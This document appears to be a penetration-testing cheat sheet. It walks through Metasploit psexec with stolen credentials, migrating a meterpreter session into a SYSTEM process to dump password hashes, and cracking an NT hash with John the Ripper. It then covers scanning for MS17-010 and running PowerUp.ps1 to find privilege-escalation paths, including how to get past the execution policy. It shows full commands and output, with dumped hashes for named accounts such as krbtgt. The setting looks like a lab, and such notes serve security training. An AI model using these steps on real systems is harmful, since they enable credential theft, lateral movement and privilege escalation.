Meterpreter

The psexec module needs working credentials (set SMBUser and SMBPass, plus SMBDomain for a domain account) and a target with port 445 reachable:

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS x.y.z.z
msf6 exploit(windows/smb/psexec) > exploit
meterpreter > ps

If hashdump fails with this error:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

migrate into a process running as NT AUTHORITY\SYSTEM (here dns.exe, PID 2516) and retry:

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x64   0
 68    4     Registry          x64   0
 396   4     smss.exe          x64   0
 544   532   csrss.exe         x64   0
 2516  736   dns.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
meterpreter > migrate 2516
[*] Migrating from 1108 to 2516...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:2c03f65f69ecd3ed0a8c3f850a8b253d:::

We can then try to crack the password of jchambers. The fourth field of each line is the NT hash; the third field, aad3b435b51404eeaad3b435b51404ee on every account, is the empty LM hash, meaning no LM hash is stored and the NT hash is the only one to attack:

$ cat ntlm 
69596c7aa1e8daee17f8e78870e25a5c
$ ~/src/john/run/john --format=NT --wordlist rockyou.txt ntlm
Warning: invalid UTF-8 seen reading rockyou.txt
Using default input encoding: UTF-8
Loaded 52 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Cracked 1 password hash (is in /home/user/src/john/run/john.pot), use "--show"
Remaining 51 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with wordlist:/home/user/src/john/run/password.lst
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:00 DONE (2024-02-20 20:12) 0g/s 12826Kp/s 12826Kc/s 654144KC/s Dontrell..sambarock
Session completed.

Note what that run actually did: john takes --wordlist=FILE, so the bare --wordlist fell back to the default wordlist (password.lst, as the "Proceeding with wordlist:" line shows) and rockyou.txt was loaded as a second hash file (hence the UTF-8 warning and the 52 loaded hashes). Use --wordlist=rockyou.txt instead; john --show --format=NT ntlm prints a hash that is already in john.pot.

Identifying the vulnerability

We can check whether the Windows target is vulnerable to MS17-010 (the SMBv1 flaws exploited by EternalBlue, CVE-2017-0144) with the Metasploit scanner module; for auxiliary modules, run and exploit do the same thing:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.71.98
RHOSTS => 10.10.71.98
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 10.10.71.98:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.71.98:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Enumerate Windows

We can use the PowerShell script PowerUp.ps1 (from PowerSploit) to look for privilege-escalation misconfigurations on a Windows system, such as unquoted service paths, writable service binaries and registry keys, DLL hijacking paths and AlwaysInstallElevated:

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Import-Module C:\Users\toto\PowerUp.ps1
Invoke-AllChecks

If the execution policy blocks the import, start the shell with powershell -ExecutionPolicy Bypass or dot-source the script (. C:\Users\toto\PowerUp.ps1). Expect the script itself to be flagged by Defender/AMSI on a patched host.